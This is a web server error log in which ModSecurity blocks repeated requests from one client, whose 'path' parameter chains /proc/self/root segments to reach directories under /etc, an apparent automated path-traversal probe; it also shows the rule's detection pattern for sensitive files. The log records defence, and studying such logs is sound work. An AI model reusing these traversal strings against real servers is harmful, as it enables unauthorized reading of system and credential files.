[Mon Mar 16 11:17:57.294570 2026] [:error] [pid 11972:tid 140411691570944] [client 74.7.243.203:59472] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRFZqj1wV0Si-OkefjBgAAAAY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:17:58.611049 2026] [:error] [pid 21806:tid 140411557287680] [client 74.7.243.203:59474] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRFtSswJuvopo3lOhXFQAAAJY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:17:59.939694 2026] [:error] [pid 32654:tid 140411683178240] [client 74.7.243.203:59476] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRFwlT9VtDQc7bgUyljAAAAQc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:18:01.206521 2026] [:error] [pid 21946:tid 140411674785536] [client 74.7.243.203:51286] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRGXbQATo66fKoS7xFsAAAAMg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:18:02.623260 2026] [:error] [pid 10709:tid 140411641214720] [client 74.7.243.203:51296] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRGhXjF1vJNtV6CWrvMQAAAcw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:18:03.816179 2026] [:error] [pid 10709:tid 140411658000128] [client 74.7.243.203:51310] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRGxXjF1vJNtV6CWrvMgAAAco"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:18:05.143934 2026] [:error] [pid 21533:tid 140411666392832] [client 74.7.243.203:51316] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRHXjZBu2q05ozVU9NlwAAAUk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:18:06.408746 2026] [:error] [pid 10709:tid 140411599251200] [client 74.7.243.203:51322] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRHhXjF1vJNtV6CWrvMwAAAdE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:18:07.704785 2026] [:error] [pid 32654:tid 140411741927168] [client 74.7.243.203:51332] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRHwlT9VtDQc7bgUyljgAAAQA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:18:09.039316 2026] [:error] [pid 21805:tid 140411641214720] [client 74.7.243.203:51340] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRIbABkC4fWIHEf8Hi2QAAAEw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:18:10.361177 2026] [:error] [pid 21533:tid 140411624429312] [client 74.7.243.203:53170] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRInjZBu2q05ozVU9NmAAAAU4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:18:11.622636 2026] [:error] [pid 11972:tid 140411590858496] [client 74.7.243.203:53174] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRI5qj1wV0Si-OkefjBwAAABI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:18:12.826363 2026] [:error] [pid 32654:tid 140411691570944] [client 74.7.243.203:53190] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRJAlT9VtDQc7bgUylkAAAAQY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:18:14.167373 2026] [:error] [pid 32654:tid 140411616036608] [client 74.7.243.203:53200] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRJglT9VtDQc7bgUylkgAAAQ8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:18:15.382064 2026] [:error] [pid 10831:tid 140411716749056] [client 74.7.243.203:53214] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRJ46lpbStxTqkSktksQAAAkM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:18:16.673934 2026] [:error] [pid 21806:tid 140411565680384] [client 74.7.243.203:53228] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRKNSswJuvopo3lOhXGwAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:18:17.983006 2026] [:error] [pid 21946:tid 140411649607424] [client 74.7.243.203:53238] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRKXbQATo66fKoS7xFswAAAMs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:18:19.129308 2026] [:error] [pid 21805:tid 140411565680384] [client 74.7.243.203:53244] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRK7ABkC4fWIHEf8Hi4wAAAFU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:18:20.333654 2026] [:error] [pid 21805:tid 140411582465792] [client 74.7.243.203:58252] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRLLABkC4fWIHEf8Hi5gAAAFM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:18:21.633584 2026] [:error] [pid 32654:tid 140411733534464] [client 74.7.243.203:58260] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRLQlT9VtDQc7bgUyllQAAAQE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:18:22.924659 2026] [:error] [pid 32654:tid 140411649607424] [client 74.7.243.203:58270] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRLglT9VtDQc7bgUyllwAAAQs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:18:24.225883 2026] [:error] [pid 32654:tid 140411708356352] [client 74.7.243.203:58276] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id 